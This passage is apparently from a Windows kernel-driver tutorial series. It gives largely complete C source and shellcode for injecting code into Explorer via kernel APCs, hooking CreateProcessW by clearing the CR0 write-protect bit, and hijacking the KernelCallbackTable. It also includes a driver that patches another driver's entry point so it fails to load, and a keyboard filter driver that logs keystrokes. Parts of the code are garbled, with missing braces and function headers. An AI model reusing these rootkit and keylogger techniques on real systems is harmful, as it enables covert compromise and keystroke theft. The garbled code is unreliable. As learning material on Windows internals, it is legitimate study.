      PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, NULL, KernelMode, NULL);  
      if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))  

The first one specifies that this is a kernelmode APC, while the second one passes two parameters to the kernel routine. These parameters are the pointer to the usermode shellcode and the pointer to the EPROCESS related to Explorer.
The kernelmode APC is still targeting Explorer.exe like before. Similarly to the shellcode, it retrieves and walks the list of LDR_DATA_TABLE_ENTRY structures to locate the imagebase of kernel32.dll. Once found, the routine retrieves the address of the CreateProcessW API from the export table, and proceeds by patching it in order to jump to the shellcode. I chose CreateProcessW just because it is easy to trigger it on command (e.g. by running a process from explorer's GUI), but the method applies equally to any other API.

The shellcode has also been slightly modified in that I added the following bytes:
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,  // last bytes of previous shellcode, padded with nops  
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // myflag dq 0  
 0x65, 0x48, 0xa1, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // mov rax,qword ptr gs:[40h] TEB.ClientId.UniqueProcess << entry  
 0x3d, 0x00, 0x00, 0x00, 0x00,                    // cmp   eax, <pid> (<pid> will be patched with the PID of explorer.exe)  
 0x75, 0x2e,                                      // jnz   Done  (0x2e = 46 bytes, up to the "sub rsp,68h" below)  
 0x53,                                            // push  rbx  
 0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00,        // mov   rax, 0  
 0x48, 0xC7, 0xC3, 0x01, 0x00, 0x00, 0x00,        // mov   rbx, 1  
 0xF0, 0x48, 0x0F, 0xB1, 0x1D, 0xce, 0xff, 0xff, 0xff,  // lock  cmpxchg cs:myflag, rbx  
 0x5B,                                            // pop   rbx  
 0x75, 0x13,                                      // jnz   Done   (shellcode is run only once)  
 // save registers used by the shellcode routine: rax, rcx, r9, r8, rdx  
 0x41, 0x50,      // push  r8  
 0x41, 0x51,      // push  r9  
 0x50,            // push  rax  
 0x51,            // push  rcx  
 0x52,            // push  rdx  
 0xE8, 0x5F, 0xFC, 0xFF, 0xFF,       // call  shellcode (beginning of shellcode)  
 0x5a,            // pop   rdx  
 0x59,            // pop   rcx  
 0x58,            // pop   rax  
 0x41, 0x59,      // pop   r9  
 0x41, 0x58,      // pop   r8  
 0x48, 0x83, 0xec, 0x68,             // sub   rsp,68h  (first two instructions of CreateProcessW)  
 0x48, 0x8b, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00,     // mov   rax,qword ptr [rsp+0B8h]  
 0xE9, 0x00, 0x00, 0x00, 0x00        // will be patched in order to jump to the rest of the original API instructions  

The JMP in the API entry point will actually transfer the execution to the third line of this block of instructions (the one marked with "entry"). This code begins by verifying that it is being run inside the Explorer process. It does so by comparing TEB.ClientId.UniqueProcess against a Pid hardcoded in the CMP instruction (fourth line). The CMP instruction currently has a Pid of zero (notice the four bytes following the 0x3d), but these bytes will be patched by the kernelmode APC routine with the value of the Pid of the Explorer process.
After this check, the code verifies that it has not already been run by examining the line containing "myflag dq 0". These eight bytes are a quadword that simply stores 0 initially, and which is updated to 1 after the "lock    cmpxchg cs:myflag, rbx" is run for the first time.
If both checks are satisfied, the code saves some registers on the stack, and calls the original code that I have described in the previous method. When the original shellcode returns, the code restores the registers saved earlier, executes the first two instructions of CreateProcessW and jumps to the third instruction of the original API. Again, the jump in the last line is followed by zeroed bytes, which means it jumps to the next instruction, but, as we will see later, the four bytes will be patched with the correct offset that will lead the execution flow right to the third instruction of CreateProcessW.
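The run-once check performed by "lock cmpxchg cs:myflag, rbx" corresponds to an atomic compare-and-swap of the flag from 0 to 1. As an illustration only (this is C11 usermode code, not what is injected), the same logic can be written as follows; `claim_first_run` is a name I made up for the example.

```c
#include <assert.h>
#include <stdatomic.h>

/* Plays the role of "myflag dq 0" in the stub. */
static atomic_llong myflag = 0;

/* Returns 1 only for the first caller, 0 for every later one.
   The compare-and-swap succeeds only while the flag still holds 0. */
static int claim_first_run(void)
{
    long long expected = 0;
    return atomic_compare_exchange_strong(&myflag, &expected, 1LL) ? 1 : 0;
}
```

Because the comparison and the update happen as a single atomic step, two threads entering the hook at the same time cannot both see the flag as 0.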
I had to save two instructions because when patching the API entry point I am writing a long JMP, which takes 5 bytes. The first instruction is only 4 bytes long, thus the patch ends up overwriting also the first byte of the following instruction. For this reason, the first two instructions must be preserved and executed in order to restore the original execution flow.
Note that here I hardcoded the first two instructions in the shellcode, because this is a proof-of-concept. To generalize the method it is fundamental to use a mini-disassembler to understand how many instructions are going to be overwritten during the patch (so that they can be saved in the shellcode itself). Also note that if the very first instructions are relative jumps or calls, they cannot be simply copied, but their relative offsets must be recalculated.
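Both patched jumps are 5-byte JMP rel32 instructions, whose displacement is relative to the address of the instruction that follows the jump. A minimal sketch of that computation is shown below; the function names and the sample addresses are hypothetical and only serve to show the arithmetic.

```c
#include <assert.h>
#include <stdint.h>

#define JMP_REL32_LEN 5  /* opcode 0xE9 followed by a 4-byte displacement */

/* Displacement to store in a JMP rel32 located at jmp_addr so that it lands
   on target: the CPU adds it to the address of the next instruction. */
static int32_t jmp_rel32(uint64_t jmp_addr, uint64_t target)
{
    return (int32_t)(uint32_t)(target - (jmp_addr + JMP_REL32_LEN));
}

/* Encodes the jump into dst, which stands for the bytes located at dst_addr. */
static void write_jmp(uint8_t *dst, uint64_t dst_addr, uint64_t target)
{
    uint32_t disp = (uint32_t)jmp_rel32(dst_addr, target);
    dst[0] = 0xE9;
    for (int i = 0; i < 4; i++)
        dst[1 + i] = (uint8_t)(disp >> (8 * i));  /* little-endian */
}
```

A displacement of zero therefore means "jump to the next instruction", which is why the unpatched JMP at the end of the stub falls through. Note that a rel32 jump can only reach targets within roughly 2 GB of the jump itself.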

Finally, here is the code of the KernelRoutine:
 VOID KernelRoutine(struct _KAPC *Apc,
      PKNORMAL_ROUTINE *NormalRoutine,
      PVOID *NormalContext,
      PVOID *SystemArgument1,   // address of usermode code
      PVOID *SystemArgument2 )  // pEPROCESS
 {
      NTSTATUS status_code;
      UNICODE_STRING apiName;
      unsigned __int64 peb, p_ldr, p_LDR_DATA_TABLE_ENTRY, pShellcode;
      unsigned __int64 image_base, image_data_directory, export_table, AddressOfNames, AddressOfFunctions;
      unsigned __int32 AddressOfNameOrdinals;
      unsigned __int64 cr0;
      int count = 0;
      KIRQL apc_irql, old_irql;
      // find CreateProcessW and patch it:
      // find the peb from eprocess
      peb = ((unsigned __int64 *)SystemArgument2)[0];
      peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];
      // find LDR in the peb
      p_ldr = peb + 0x18;
      p_ldr = *((unsigned __int64 *)p_ldr);
      // find kernel32 in one of the LDR
      p_LDR_DATA_TABLE_ENTRY = *((unsigned __int64 *)(p_ldr + 0x10));
      while(wcscmp((wchar_t *)(*(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x60)), L"kernel32.dll") != 0)
      {
           p_LDR_DATA_TABLE_ENTRY = *(unsigned __int64 *)p_LDR_DATA_TABLE_ENTRY;
      }
      // get kernel32 imagebase
      image_base = *(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x30);
      // parse export table to find CreateProcessW and get the address
      // image_base + offset PE_HEADER + offset _IMAGE_NT_HEADERS64._IMAGE_OPTIONAL_HEADER + offset _IMAGE_OPTIONAL_HEADER.DataDirectory[0]
      image_data_directory = image_base + *(unsigned __int32*)(image_base +0x3c) + 0x18 + 0x70;
      export_table = *((unsigned __int32 *)image_data_directory) + image_base;
      AddressOfNames = *((unsigned __int32 *)(export_table + 0x20)) + image_base;
      // count ends up being the index of the name, needed to look up the ordinal
      while(strncmp((char *)(*(unsigned __int32*)AddressOfNames) + image_base, "CreateProcessW", sizeof("CreateProcessW")) != 0)
      {
           AddressOfNames += 4;
           count++;
      }
      AddressOfNameOrdinals = ((unsigned __int16 *)(*((unsigned __int32 *)(export_table + 0x24)) + image_base))[count];
      AddressOfFunctions = ((unsigned __int32 *)(*((unsigned __int32 *)(export_table + 0x1c)) + image_base))[AddressOfNameOrdinals] + image_base;
      // (copy the first API instructions in the stub, already done)
      // patch the stub of the shellcode to make the last jmp point to the third instruction of CreateProcessW (api + 0x0C)
      pShellcode = *(unsigned __int64 *)SystemArgument1;
      *((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-4]) = (unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x0C);
      // patch the opcode that compares the current PID with the PID of the target process
      *((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-0x45]) = (unsigned __int32)PsGetProcessId(*((PEPROCESS*)SystemArgument2));
      // disable the interrupts, then clear CR0.WP (bit 16) to write on read-only pages
      _disable();
      cr0 = __readcr0();
      __writecr0(cr0 & 0xfffeffff);
      // patch the API address to jmp to the stub, this patch will be visible to all processes
      // since removing the Write-Protect flag also disables the Copy-On-Write
      ((char *)AddressOfFunctions)[0] = 0xe9;
      *(unsigned __int32 *)(AddressOfFunctions + 1) = 0 - ((unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x56));
      // restore the Write-Protect flag and the interrupts
      __writecr0(cr0);
      _enable();
      ExFreePool(Apc);     // release the KAPC allocated in DriverEntry
 }

As anticipated earlier, this routine hooks the CreateProcessW API by overwriting its first opcodes with a JMP to the shellcode (specifically, to its offset marked with the "Entry" comment) and by patching some of its opcodes with parameters that are available only at run-time. In particular, these parameters are: the address of the third instruction of CreateFileW and the the PID of the target process.
There is still one interesting detail that we haven't discussed yet. In order to perform the hook, the KernelRoutine clears the WriteProtect flag in the CR0 register, which allows kernel code to write to any present memory page, even if it is marked as read-only. However, this also has the side effect of disabling copy-on-write, and we will see how this is addressed.
Normally, a physical memory page of code from a system DLL is shared among all processes' virtual memory. If a process decides to patch such code (e.g. an API), the OS would detect the write attempt and would allocate a dedicated physical memory page to the patching process so that it would remain localized and would not affect the other processes. However, if the WriteProtect is disabled, the OS will not react to the write attempt and thus will not allocate a dedicated physical page for the patch. This means that the patch is effectively operating on all the running processes, but not all of them have a shellcode to jump to. Therefore, to prevent crashing them, the shellcode needs to verify that the current Pid is indeed the one of Explorer.
Note: in cases in which the kernel routine needs to modify sensitive areas of memory, some extra care is generally required. For example, it may be necessary to: disable the interrupts (possibly on all the CPUs by scheduling a DPC); use atomic operations; use proper synchronization. In my case, the driver was tested on a machine with a single CPU, therefore once the interrupts are disabled with _disable(), it is pretty safe to patch the code and disable the WriteProtect without atomic operations or synchronization.
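The bit manipulation on CR0 can be sketched on its own. WriteProtect is bit 16 of CR0, so the mask 0xfffeffff used in the driver clears exactly that bit in the low dword. Since the constant is 32 bits wide it also zeroes bits 63:32 of the 64-bit value, which is harmless because those bits of CR0 are reserved and must be zero. The helper names below are hypothetical, and in a driver the value would come from __readcr0() and go back through __writecr0().

```c
#include <assert.h>
#include <stdint.h>

#define CR0_WP (1ULL << 16)  /* Write Protect: bit 16 of CR0 */

/* Value to write to CR0 to allow ring-0 writes to read-only pages. */
static uint64_t cr0_without_wp(uint64_t cr0) { return cr0 & ~CR0_WP; }

/* Value to write to CR0 to re-enable write protection afterwards. */
static uint64_t cr0_with_wp(uint64_t cr0)    { return cr0 | CR0_WP; }

/* Non-zero if write protection is currently enabled in the given value. */
static int cr0_wp_enabled(uint64_t cr0)      { return (cr0 & CR0_WP) != 0; }
```

Keeping the original CR0 value and writing it back once the patch is done (rather than recomputing it) is the simplest way to make sure the flag is restored.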

Method 3
I tried to work on a third method, which proved to be unstable and therefore cannot be used; however, I think it deserves some attention. This method tries to harness the kernelmode API KeUserModeCallback in order to run code in usermode.
The OS maintains a table of usermode callback routines, which is located in usermode and is pointed to by PEB.KernelCallbackTable. In particular, these callbacks can be called from kernelmode with the API KeUserModeCallback, which takes as input the index of the desired function within the table. Thus, by inserting a pointer to the shellcode inside this table, I can manage to call it from kernelmode and have it executed in usermode.

The code encompasses some changes. A first difference is at the end of the shellcode:
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xcd, 0x2b, 0xc3  
which ends with an "int 2b" (0xcd 0x2b) and a "ret" (0xC3). We will see later why.

Another modification occurs in the DriverEntry, when the KAPC structure is initialized:

PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)(baseaddr + 0x35A), UserMode, NULL);
if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))  

The code uses again a dummy normal routine: in fact, the "baseaddr + 0x35a" parameter refers to the last byte of the shellcode (the RET). If a normal routine is not provided, the system seems to crash. 

Finally, the KernelRoutine is the one that changes significantly and does the actual job of overwriting an entry in the KernelCallbackTable :
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   // address of usermode code  
      PVOID *SystemArgument2 )  // pEPROCESS  
      NTSTATUS status_code;  
      UNICODE_STRING apiName;  
      NTSTATUS (*pKeUserModeCallback)(ULONG apiNumber, void* inputBuffer, ULONG inputLength, void** outputBuffer, ULONG* outputLength);  
      unsigned __int64 peb, callback_table;  
      unsigned __int64 cr0;  
      KIRQL apc_irql, old_irql;    
      DbgPrint("APC kernel routine\n");  
      RtlInitUnicodeString(&apiName, L"KeUserModeCallback");  
      pKeUserModeCallback = MmGetSystemRoutineAddress(&apiName);   
      if(pKeUserModeCallback == NULL)  
           DbgPrint("Cannot find pKeUserModeCallback\n");  
      DbgPrint("Usermode address: %p \n", *SystemArgument1);  
      // retrieve PEB address     
      peb = ((unsigned __int64 *)SystemArgument2)[0];  
      peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];  
      // retrieve kernel callback table     
      callback_table = ((unsigned __int64*)(((UCHAR *)peb) + 0x58))[0] ;  
      // insert shellcode address into an empty function slot (slot n 0x76, 0x76*8 = 3b0)     
      callback_table += 0x3b0;   
      cr0 = __readcr0();  
      __writecr0(cr0 & 0xfffeffff);  
      ((unsigned __int64*)callback_table)[0] = (unsigned __int64)((unsigned __int64 *)SystemArgument1)[0];  
      // call it, but first...  be careful:       
      // usermode callbacks can only run at PASSIVE, or else bugcheck IRQL_GT_ZERO_AT_SYSTEM_SERVICE  
      apc_irql = KeGetCurrentIrql();  
      KeLowerIrql(PASSIVE_LEVEL);  
      status_code = pKeUserModeCallback(0x76, 0, 0, 0, 0);  
      KeRaiseIrql(apc_irql, &old_irql);

      // ** from user mode to terminate do  xor ecx, ecx / xor edx, edx / int 2b (see shellcode) **

I chose to overwrite the table entry at index 0x76 because on my system it was always zero, but it would be preferable to have a more generic approach to find an empty entry. Once the table entry is written with the pointer to the shellcode, the driver lowers the IRQL to PASSIVE_LEVEL (it will be restored later) and issues a call to KeUserModeCallback with 0x76 as the index. The routine gets executed (Notepad starts successfully) and when the usermode code has finished its task, it returns to the kernel by issuing an int 2b. Unfortunately, when the routine ends, it crashes. I ran some tests and experiments, trying to figure out whether the problem was related to the stack, but I always ended up with a crash (a usermode one, not a BSOD). In the end, I did not investigate this issue further, but I believe that it should be possible to make this method stable and reliable.
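A more generic way of picking a slot could be sketched as a linear scan for the first zero entry. This is only an illustration on a plain array: the function name find_empty_slot is hypothetical, and the number of entries is an assumption that the caller must supply, since the table does not store its own length and its size differs between Windows builds. A zero entry only means the slot is unused at the time of the scan.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Return the index of the first zero entry in table[first..count),
 * or -1 if every entry in that range is in use. */
static long find_empty_slot(const uint64_t *table, size_t count, size_t first)
{
    for (size_t i = first; i < count; i++) {
        if (table[i] == 0)
            return (long)i;
    }
    return -1;
}
```

The returned index would replace the hardcoded 0x76, both when computing the slot offset (index * 8) and when calling KeUserModeCallback.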

To protect a shared memory resource (allocated in nonpaged memory) in an SMP environment I would use a spinlock: the routines responsible for accessing the resource would need to acquire the spinlock in order to read or write the data.
Before acquiring a spinlock, the system raises the IRQL to DISPATCH_LEVEL so that other threads cannot preempt the current one on that CPU, then it attempts to obtain ownership of the spinlock by continuously checking its availability in a loop (that is, spinning). This mechanism ensures that only one thread on one CPU at a time accesses the shared data, and it is quite efficient, provided that the lock is not held for a long time.
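The spinning part of the mechanism can be illustrated with a user-mode analogue built on C11 atomics. This is a sketch, not kernel code: a driver would use a KSPIN_LOCK with KeAcquireSpinLock and KeReleaseSpinLock, which also take care of raising and restoring the IRQL, something this example does not model. All type and function names below are hypothetical.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>

typedef struct {
    atomic_flag locked;
} spinlock_t;

static void spin_init(spinlock_t *l)
{
    atomic_flag_clear(&l->locked);
}

/* Try once: returns true if the lock was free and is now owned by the caller. */
static bool spin_try_acquire(spinlock_t *l)
{
    return !atomic_flag_test_and_set_explicit(&l->locked, memory_order_acquire);
}

/* Busy-wait until the lock becomes available. */
static void spin_acquire(spinlock_t *l)
{
    while (!spin_try_acquire(l)) {
        /* spin */
    }
}

static void spin_release(spinlock_t *l)
{
    atomic_flag_clear_explicit(&l->locked, memory_order_release);
}

/* Shared resource protected by the lock. */
typedef struct {
    spinlock_t lock;
    long value;
} shared_counter_t;

static void counter_add(shared_counter_t *c, long delta)
{
    spin_acquire(&c->lock);
    c->value += delta;       /* critical section: keep it short */
    spin_release(&c->lock);
}
```

Every reader and writer of the shared data goes through the same acquire/release pair, and the critical section is kept as short as possible so that other CPUs do not waste time spinning.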

 #include <Ntifs.h>  
 #include <string.h>  
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
 typedef struct _IMAGE_DOS_HEADER  
      WORD e_magic;  
      WORD e_cblp;  
      WORD e_cp;  
      WORD e_crlc;  
      WORD e_cparhdr;  
      WORD e_minalloc;  
      WORD e_maxalloc;  
      WORD e_ss;  
      WORD e_sp;  
      WORD e_csum;  
      WORD e_ip;  
      WORD e_cs;  
      WORD e_lfarlc;  
      WORD e_ovno;  
      WORD e_res[4];  
      WORD e_oemid;  
      WORD e_oeminfo;  
      WORD e_res2[10];  
      LONG e_lfanew;  
 typedef struct _IMAGE_FILE_HEADER {  
      WORD Machine;  
      WORD NumberOfSections;  
      DWORD TimeDateStamp;  
      DWORD PointerToSymbolTable;  
      DWORD NumberOfSymbols;  
      WORD SizeOfOptionalHeader;  
      WORD Characteristics;  
 typedef struct _IMAGE_DATA_DIRECTORY {  
      DWORD VirtualAddress;  
      DWORD Size;  
  typedef struct _IMAGE_OPTIONAL_HEADER64 {  
      WORD Magic; /* 0x20b */  
      BYTE MajorLinkerVersion;  
      BYTE MinorLinkerVersion;  
      DWORD SizeOfCode;  
      DWORD SizeOfInitializedData;  
      DWORD SizeOfUninitializedData;  
      DWORD AddressOfEntryPoint;  
      DWORD BaseOfCode;  
      ULONGLONG ImageBase;  
      DWORD SectionAlignment;  
      DWORD FileAlignment;  
      WORD MajorOperatingSystemVersion;  
      WORD MinorOperatingSystemVersion;  
      WORD MajorImageVersion;  
      WORD MinorImageVersion;  
      WORD MajorSubsystemVersion;  
      WORD MinorSubsystemVersion;  
      DWORD Win32VersionValue;  
      DWORD SizeOfImage;  
      DWORD SizeOfHeaders;  
      DWORD CheckSum;  
      WORD Subsystem;  
      WORD DllCharacteristics;  
      ULONGLONG SizeOfStackReserve;  
      ULONGLONG SizeOfStackCommit;  
      ULONGLONG SizeOfHeapReserve;  
      ULONGLONG SizeOfHeapCommit;  
      DWORD LoaderFlags;  
      DWORD NumberOfRvaAndSizes;  
 typedef struct _IMAGE_NT_HEADERS64 {  
      DWORD Signature;  
      IMAGE_FILE_HEADER FileHeader;  
      IMAGE_OPTIONAL_HEADER64 OptionalHeader;  
 #ifdef ALLOC_PRAGMA  
 #pragma alloc_text( INIT, DriverEntry )  
      PUNICODE_STRING FullImageName,  
      HANDLE ProcessId,  
      PIMAGE_INFO ImageInfo  
      WCHAR *drivername;  
      UNICODE_STRING servicename;  
      NTSTATUS unload;  
      UINT8 * entry_point;  
      unsigned __int64 cr0;  
      char patch[] = {0xb8, 0x01, 0x00, 0x00, 0xc0, 0xc3};  
           // ignore usermode images  
      if(FullImageName->Length >= 8*sizeof(WCHAR))  
           drivername = FullImageName->Buffer + (FullImageName->Length/sizeof(WCHAR)) - 8;  
           if(wcsncmp(drivername, L"\\bda.sys", 8) == 0)  
                DbgPrint("bda.sys driver detected! imagebase %p \n", (UINT8*)ImageInfo->ImageBase);  
                MZ = (IMAGE_DOS_HEADER *) ImageInfo->ImageBase;  
                PE = (PIMAGE_NT_HEADERS64) ( ((UINT8*)ImageInfo->ImageBase) + MZ->e_lfanew);  
                entry_point = PE->OptionalHeader.AddressOfEntryPoint + (UINT8*)ImageInfo->ImageBase;  
                cr0 = __readcr0();  
                __writecr0(cr0 & 0xfffeffff);  
                // b8 01 00 00 c0   mov  eax, 0xc0000001  
                // c3         ret  
                memcpy(entry_point , &patch, sizeof(patch));  
 VOID MyUnload(__in PDRIVER_OBJECT DriverObject)  
 DriverEntry(PDRIVER_OBJECT  DriverObject, PUNICODE_STRING RegistryPath)  
      DriverObject->DriverUnload = &MyUnload;   
      return STATUS_SUCCESS;  

The driver installs a load image notify routine via PsSetLoadImageNotifyRoutine. This routine verifies if the name of the loaded image is bda.sys, and if it is, it patches its entry point with assembly instructions equivalent to "mov eax, 0xc0000001" (that is, STATUS_UNSUCCESSFUL) followed by "ret".

The load image notify routine is called after the driver is mapped in memory, but before its entry point is executed. Thus, patching the entry point with the above code will cause the driver to report a failure in loading and the OS will unload bda.sys from memory without executing any other code from it.
Finally, when the driver is unloaded, the callback to the load image notify routine is removed via PsRemoveLoadImageNotifyRoutine.
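The header walk that leads to the entry point can be sketched in user mode on a byte buffer. This is a minimal illustration under stated assumptions: the function names are hypothetical, the image is treated as already mapped (so the entry point RVA is used directly as an offset), the host is little-endian, and raw offsets are used instead of the structure definitions (e_lfanew is at 0x3C in the DOS header, AddressOfEntryPoint is 0x28 bytes past the "PE" signature).

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define E_LFANEW_OFFSET  0x3C  /* IMAGE_DOS_HEADER.e_lfanew */
#define ENTRY_RVA_OFFSET 0x28  /* Signature (4) + IMAGE_FILE_HEADER (20) + 16 bytes into the optional header */

/* mov eax, 0xC0000001 (STATUS_UNSUCCESSFUL) ; ret */
static const uint8_t fail_patch[] = { 0xB8, 0x01, 0x00, 0x00, 0xC0, 0xC3 };

/* Return a pointer to the entry point of a mapped image, or NULL if the
 * headers do not look like a PE image or point outside the buffer. */
static uint8_t *find_entry_point(uint8_t *image, size_t image_size)
{
    uint32_t e_lfanew, entry_rva;

    if (image_size < E_LFANEW_OFFSET + 4 || image[0] != 'M' || image[1] != 'Z')
        return NULL;
    memcpy(&e_lfanew, image + E_LFANEW_OFFSET, sizeof(e_lfanew));
    if ((uint64_t)e_lfanew + ENTRY_RVA_OFFSET + 4 > image_size)
        return NULL;
    if (memcmp(image + e_lfanew, "PE\0\0", 4) != 0)
        return NULL;
    memcpy(&entry_rva, image + e_lfanew + ENTRY_RVA_OFFSET, sizeof(entry_rva));
    if ((uint64_t)entry_rva + sizeof(fail_patch) > image_size)
        return NULL;
    return image + entry_rva;
}

/* Overwrite the entry point so that it immediately returns a failure status.
 * Returns 1 on success, 0 if the entry point could not be located. */
static int patch_entry_point(uint8_t *image, size_t image_size)
{
    uint8_t *entry = find_entry_point(image, image_size);
    if (entry == NULL)
        return 0;
    memcpy(entry, fail_patch, sizeof(fail_patch));
    return 1;
}
```

In the driver, the buffer is ImageInfo->ImageBase and the write additionally requires the WriteProtect flag to be cleared, since the image pages are mapped read-only.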

 #include <ntddkbd.h>  
 typedef struct _DEVICE_EXTENSION   
   PDEVICE_OBJECT pTargetDevice;   

 #include <ntddk.h>  
 #include <string.h>  
 #include "sioctl.h"  
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
 #ifdef ALLOC_PRAGMA  
 #pragma alloc_text( INIT, DriverEntry )  
 PDEVICE_OBJECT kbd_class_dev = NULL;  
 PDEVICE_OBJECT my_keyboard_dev = NULL;  
 // scan codes taken from (column Set 1)  
 #define SCAN_MAPPINGS 0x3b  
 unsigned char* scan_code_mapping[SCAN_MAPPINGS] = {  
 "<unk>", "<unk>", "1 or !", "2 or @", "3 or #", "4 or $", "5 or %", "6 or ^", "7 or &", "8 or *", "9 or (", "0 or )",  
 "- or _", "= or +", "Backspace", "Tab", "Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P", "[ or {", "] or }", "Enter", "LCtrl",  
 "A", "S", "D", "F", "G", "H", "J", "K", "L", "; or :", "' or \"", "` or ~", "LShift", "\\ or |",   
 "Z","X", "C", "V", "B", "N", "M", ", or <", ". or >", "/ or ?", "RShift", "<unk>", "LAlt", "space", "CapsLock"  
 VOID MyUnload(__in PDRIVER_OBJECT DriverObject)  
      DbgPrint("Unload routine\n");  
 NTSTATUS io_completion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)  
      KEYBOARD_INPUT_DATA *key_buffer;  
      unsigned long key_number = 0, i;  
      // read data from the IRP, put it in key  
      if(Irp->IoStatus.Status == STATUS_SUCCESS)  
           // system buffer may contain an array of KEYBOARD_INPUT_DATA  
           // The size (in bytes) of the SystemBuffer is stored in Irp->IoStatus.Information  
           key_buffer = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;  
           if(Irp->IoStatus.Information != 0)  
                key_number = (unsigned long)(Irp->IoStatus.Information) / sizeof(KEYBOARD_INPUT_DATA);  
           for(i = 0; i < key_number; i++)  
                // only log char in a key release event, not key press  
                if(key_buffer[i].Flags == KEY_BREAK)  
                     if(key_buffer[i].MakeCode < SCAN_MAPPINGS)  
                          // translate and log the scan code  
                          DbgPrint("Key scancode: %s \n", scan_code_mapping[ key_buffer[i].MakeCode ]);  
      if(Irp->PendingReturned) IoMarkIrpPending(Irp);  
      return Irp->IoStatus.Status;  
 NTSTATUS kbd_mj_read(PDEVICE_OBJECT DeviceObject, PIRP Irp)  
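      // the stack location must be copied before the completion routine is set on it  
      IoCopyCurrentIrpStackLocationToNext(Irp);  
      IoSetCompletionRoutine(Irp, io_completion, NULL, TRUE, TRUE, TRUE);  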
      return IoCallDriver(((PDEVICE_EXTENSION)DeviceObject->DeviceExtension)->pTargetDevice, Irp);   
 NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)  
      NTSTATUS status_code;  
      UNICODE_STRING kbd_class_name;  
      PFILE_OBJECT kbd_class_file = NULL;  
      PDEVICE_EXTENSION device_ext;  
      int i;  
      DriverObject->DriverUnload = &MyUnload;  
      DriverObject->MajorFunction[IRP_MJ_READ] = &kbd_mj_read;  
      // create a new device  
      status_code = IoCreateDevice(DriverObject, sizeof(DEVICE_EXTENSION), NULL, FILE_DEVICE_KEYBOARD, 0, FALSE, &my_keyboard_dev);  
      if(status_code != STATUS_SUCCESS)  
           DbgPrint("Error creating device \n");  
           return STATUS_UNSUCCESSFUL;  
      // retrieve the keyboard class device   
      RtlInitUnicodeString(&kbd_class_name, L"\\Device\\KeyboardClass0");  
      status_code = IoGetDeviceObjectPointer(&kbd_class_name, FILE_READ_ATTRIBUTES, &kbd_class_file, &kbd_class_dev);  
      if(status_code != STATUS_SUCCESS)  
           DbgPrint("Error getting keyboard class object \n");  
           return STATUS_UNSUCCESSFUL;  
      // set the device extension for the new device and attach it to class device     
      RtlZeroMemory(my_keyboard_dev->DeviceExtension, sizeof(DEVICE_EXTENSION));  
      device_ext = (PDEVICE_EXTENSION)my_keyboard_dev->DeviceExtension;  
      device_ext->pTargetDevice = IoAttachDeviceToDeviceStack(my_keyboard_dev, kbd_class_dev);  
      if(device_ext->pTargetDevice == NULL)  
           DbgPrint("Error attaching to keyboard device \n");  
           return STATUS_UNSUCCESSFUL;  
      // important! Set the correct flags for the new device, especially DO_BUFFERED_IO, or else  
      // the new device won't have any flag set, and IRP.AssociatedIrp.SystemBuffer will be zero  
      // causing the system to copy the scancode data to a NULL buffer, which will bsod  
      my_keyboard_dev->Flags = kbd_class_dev->Flags;  
      return STATUS_SUCCESS;  

The driver implements a basic keylogger. It attaches its device object to the keyboard device stack and filters the IRPs going to it. In particular, the device object is created via IoCreateDevice, passing FILE_DEVICE_KEYBOARD as the DeviceType and setting its DeviceExtension to target the keyboard device stack via IoAttachDeviceToDeviceStack. The keyboard device is obtained via IoGetDeviceObjectPointer, by specifying \\Device\\KeyboardClass0 as the ObjectName. The flags of the keyboard device are actually used to set the ones of the newly created device object, as explained in the source code.
Moreover, the MajorFunction[IRP_MJ_READ] entry (in the driver object) is set to a simple pass-through function, which receives an IRP, copies the current stack location to the next device stack location (via IoCopyCurrentIrpStackLocationToNext), sets a completion routine (via IoSetCompletionRoutine) and calls the IRP_MJ_READ function of the next device (via IoCallDriver). The completion routine processes the IRP after the keyboard driver has filled it with the information about the received keystroke. The driver simply inspects each KEYBOARD_INPUT_DATA structure from the output buffer (stored in IRP.AssociatedIrp.SystemBuffer) and retrieves the keystroke scan codes.
I used standard scan codes to perform a very basic mapping of the keystrokes to the corresponding characters. In general, however, such a translation is far more complicated than this implementation.
During the unloading of the driver, the device will be first detached from the keyboard one (via IoDetachDevice) and then deleted (via IoDeleteDevice).
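The translation step performed by the completion routine can be sketched in user mode. The structure below is a hypothetical stand-in that keeps only the two fields of KEYBOARD_INPUT_DATA used here, the flag values mirror those in ntddkbd.h, and the name table is deliberately truncated to the first few Set 1 scan codes. Unlike the driver code, this sketch tests the KEY_BREAK bit and explicitly skips extended (E0/E1) keys, which need a different table.

```c
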